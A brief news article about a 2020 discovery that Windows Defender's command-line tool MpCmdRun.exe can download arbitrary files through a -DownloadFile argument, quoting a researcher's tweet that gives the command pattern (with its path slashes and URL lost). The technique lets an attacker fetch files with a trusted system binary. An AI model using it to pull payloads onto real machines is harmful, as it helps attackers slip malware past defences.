Windows Defender, the basic malware protection on any modern Windows PC, also comes packed with another handy feature: a command line interface. The “MpCmdRun.exe” (Microsoft Protection CMD) allows for utilization of security features through command line. Users could scan, trace, and tinker with a variety of commands. Now, in an update to Windows Defender, security researcher Askar Mohammad discovered that files can be downloaded with the -DownloadFile argument and a URL to accompany it.
You can use C:ProgramDataMicrosoftWindows Defenderplatform4.18.2008.9-0MpCmdRun.exe -url
-path to download your file using Windows defender itself.
— Askar (@mohammadaskar2) September 2, 2020
This -DownloadFile functionality allows a local user to download a file. In theory, however, Windows Defender and hopefully other anti-virus software packages should detect malware and remove it. No matter what, this is just another vulnerability that could be exploited that people need to watch out for.
Ultimately, it is rather interesting that something like this was discovered. One would think that a defender would not normally allow an attacker through the front gate. In any case, this is a healthy reminder to make sure your network ports are secure and unwanted downloads are blocked while upholding any "great responsibility."